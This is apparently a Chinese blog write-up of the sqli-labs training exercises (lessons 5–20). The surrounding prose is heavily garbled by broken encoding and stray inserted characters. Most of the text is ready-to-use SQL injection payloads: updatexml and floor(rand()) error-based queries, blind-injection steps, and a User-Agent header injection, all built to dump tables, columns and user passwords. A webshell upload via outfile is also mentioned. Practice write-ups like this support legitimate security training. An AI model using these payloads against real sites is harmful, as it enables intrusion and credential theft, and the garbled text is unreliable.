SQL_labs

sql-labs 1--10

less-5 ..less-6(構(gòu)造 報(bào)錯(cuò)語句)

nice_o less-5

圖片.png

less-5 (GET 類 布爾盲注)

圖片.png

less-6 (GET 類 時(shí)間盲注)

圖片.png

雙查詢

less-7(導(dǎo)出 outfile)

less-8(布爾型盲注)

圖片.png

less-9(單引號 時(shí)間盲注)

less-10(雙引號 時(shí)間盲注)

less-6

less-6

less-7

修改 my.ini 或者 使用 配置上的路徑


圖片.png

my.ini 上的路徑


圖片.png

emmm...


圖片.png

查看 um.txt


圖片.png

我們可以直接將一句話木馬導(dǎo)入進(jìn)去玫恳。


圖片.png

結(jié)果


圖片.png

less-13(單引號 雙注入)

學(xué)習(xí) sql 注入再次強(qiáng)調(diào)concat_ws的一個(gè)參數(shù)是連接字符串的分隔符,這里很明顯可以看到,但一般第一個(gè)參數(shù)一般都不是這樣傳過去的,因?yàn)闀籬tml編碼管引,要使用mysql的char函數(shù)將十進(jìn)制ASCII碼轉(zhuǎn)化成字符,如下面的(:的十進(jìn)制ASCII是58),當(dāng)然這里的分隔符也可以有多個(gè)

雙查詢

圖片.png

查表
圖片.png

less-14 ( POST 雙注入)

圖片.png

查表


圖片.png

查字段


圖片.png

查密碼
圖片.png

less-15(POST 類 布爾盲注)

圖片.png

查表


圖片.png

查字段


圖片.png

查密碼
圖片.png

less-16 (POST 類 時(shí)間盲注)

圖片.png

查表


圖片.png

Less-17 (子查詢)子查詢注入的原理即雙注入

子查詢

concat 函數(shù) group_concat 函數(shù) concat_ws()函數(shù)
concat()與group_concat()
查詢語句:
uname=admin&passwd=' or (SELECT 1 FROM(select count(),concat((select group_concat(0x7e,0x27,database(),0x27,0x7e)),floor(rand()2))a FROM information_schema.tables group by a)b) WHERE username='admin'%23

圖片.png

查表
uname=admin&passwd=' or (SELECT 1 FROM(select count(),concat((select group_concat(0x7e,0x27,table_name,0x27,0x7e) from information_schema.tables where table_schema='security'),floor(rand()2))a FROM information_schema.tables group by a)b) WHERE username='admin'%23

圖片.png

查字段
uname=admin&passwd=' or (SELECT 1 FROM(select count(),concat((select group_concat(0x7e,0x27,column_name,0x27,0x7e) from information_schema.columns where table_schema='security' and table_name='users'),floor(rand()2))a FROM information_schema.tables group by a)b) WHERE username='admin'%23

圖片.png

查 數(shù)據(jù)
uname=admin&passwd=' or (SELECT 1 FROM(select count(),concat((select concat(0x7e,id,0x27,username,0x27,password,0x7e) from users limit 0,1),floor(rand()2))a FROM information_schema.tables group by a)b) WHERE username='admin'%23

圖片.png

less-17(通過updatexml())

查庫
uname=admin&passwd=' or updatexml(1,concat(0x7e,database(),0x7e),0)%23


圖片.png

查表
uname=admin&passwd=' or updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),0)%23


圖片.png

查字段
uname=admin&passwd=' or updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),0)%23
圖片.png

查數(shù)據(jù)


圖片.png

然并沾瓦。。。
需要 這樣:uname=admin&passwd=' or updatexml(1,concat(0x7e,(select * from(select concat_ws(char(32,58,32),username,password) from users limit 0,1)a),0x7e),0)%23


圖片.png

less-18(_post 用戶代理 頭部注入)

修改 user-Agent
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:59.0) Gecko/20100101 Firefox/59.0' or updatexml(0,concat(0x7e,database(),0x7e),0),'1')#


圖片.png

less-19

修改 Referer

圖片.png

查數(shù)據(jù)


圖片.png

less-20

圖片.png
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 人面猴
    序言:七十年代末贯莺,一起剝皮案震驚了整個(gè)濱河市风喇,隨后出現(xiàn)的幾起案子,更是在濱河造成了極大的恐慌缕探,老刑警劉巖魂莫,帶你破解...
    沈念sama閱讀 216,496評論 6 501
  • 死咒
    序言:濱河連續(xù)發(fā)生了三起死亡事件,死亡現(xiàn)場離奇詭異爹耗,居然都是意外死亡耙考,警方通過查閱死者的電腦和手機(jī),發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 92,407評論 3 392
  • 救了他兩次的神仙讓他今天三更去死
    文/潘曉璐 我一進(jìn)店門鲸沮,熙熙樓的掌柜王于貴愁眉苦臉地迎上來琳骡,“玉大人,你說我怎么就攤上這事讼溺¢购牛” “怎么了?”我有些...
    開封第一講書人閱讀 162,632評論 0 353
  • 道士緝兇錄:失蹤的賣姜人
    文/不壞的土叔 我叫張陵怒坯,是天一觀的道長炫狱。 經(jīng)常有香客問我,道長剔猿,這世上最難降的妖魔是什么视译? 我笑而不...
    開封第一講書人閱讀 58,180評論 1 292
  • ?港島之戀(遺憾婚禮)
    正文 為了忘掉前任,我火速辦了婚禮归敬,結(jié)果婚禮上酷含,老公的妹妹穿的比我還像新娘。我一直安慰自己汪茧,他們只是感情好椅亚,可當(dāng)我...
    茶點(diǎn)故事閱讀 67,198評論 6 388
  • 惡毒庶女頂嫁案:這布局不是一般人想出來的
    文/花漫 我一把揭開白布。 她就那樣靜靜地躺著舱污,像睡著了一般呀舔。 火紅的嫁衣襯著肌膚如雪。 梳的紋絲不亂的頭發(fā)上扩灯,一...
    開封第一講書人閱讀 51,165評論 1 299
  • 城市分裂傳說
    那天媚赖,我揣著相機(jī)與錄音,去河邊找鬼珠插。 笑死惧磺,一個(gè)胖子當(dāng)著我的面吹牛,可吹牛的內(nèi)容都是我干的捻撑。 我是一名探鬼主播豺妓,決...
    沈念sama閱讀 40,052評論 3 418
  • 雙鴛鴦連環(huán)套:你想象不到人心有多黑
    文/蒼蘭香墨 我猛地睜開眼惜互,長吁一口氣:“原來是場噩夢啊……” “哼!你這毒婦竟也來了琳拭?” 一聲冷哼從身側(cè)響起训堆,我...
    開封第一講書人閱讀 38,910評論 0 274
  • 萬榮殺人案實(shí)錄
    序言:老撾萬榮一對情侶失蹤,失蹤者是張志新(化名)和其女友劉穎白嘁,沒想到半個(gè)月后坑鱼,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體,經(jīng)...
    沈念sama閱讀 45,324評論 1 310
  • ?護(hù)林員之死
    正文 獨(dú)居荒郊野嶺守林人離奇死亡絮缅,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點(diǎn)故事閱讀 37,542評論 2 332
  • ?白月光啟示錄
    正文 我和宋清朗相戀三年鲁沥,在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了。 大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片耕魄。...
    茶點(diǎn)故事閱讀 39,711評論 1 348
  • 活死人
    序言:一個(gè)原本活蹦亂跳的男人離奇死亡画恰,死狀恐怖,靈堂內(nèi)的尸體忽然破棺而出吸奴,到底是詐尸還是另有隱情允扇,我是刑警寧澤,帶...
    沈念sama閱讀 35,424評論 5 343
  • ?日本核電站爆炸內(nèi)幕
    正文 年R本政府宣布则奥,位于F島的核電站考润,受9級特大地震影響,放射性物質(zhì)發(fā)生泄漏读处。R本人自食惡果不足惜糊治,卻給世界環(huán)境...
    茶點(diǎn)故事閱讀 41,017評論 3 326
  • 男人毒藥:我在死后第九天來索命
    文/蒙蒙 一、第九天 我趴在偏房一處隱蔽的房頂上張望罚舱。 院中可真熱鬧井辜,春花似錦、人聲如沸管闷。這莊子的主人今日做“春日...
    開封第一講書人閱讀 31,668評論 0 22
  • 一樁弒父案,背后竟有這般陰謀
    文/蒼蘭香墨 我抬頭看了看天上的太陽渐北。三九已至,卻和暖如春铭拧,著一層夾襖步出監(jiān)牢的瞬間赃蛛,已是汗流浹背。 一陣腳步聲響...
    開封第一講書人閱讀 32,823評論 1 269
  • 情欲美人皮
    我被黑心中介騙來泰國打工搀菩, 沒想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留呕臂,地道東北人。 一個(gè)月前我還...
    沈念sama閱讀 47,722評論 2 368
  • 代替公主和親
    正文 我出身青樓肪跋,卻偏偏與公主長得像歧蒋,于是被迫代替她去往敵國和親。 傳聞我的和親對象是個(gè)殘疾皇子,可洞房花燭夜當(dāng)晚...
    茶點(diǎn)故事閱讀 44,611評論 2 353

推薦閱讀更多精彩內(nèi)容